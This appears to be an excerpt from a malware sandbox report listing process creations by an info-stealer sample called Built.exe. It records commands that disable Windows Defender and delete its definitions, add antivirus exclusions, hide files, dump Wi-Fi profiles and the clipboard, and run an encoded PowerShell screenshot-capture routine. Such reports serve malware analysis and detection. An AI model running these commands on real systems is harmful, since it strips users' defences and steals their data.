Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe"	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazg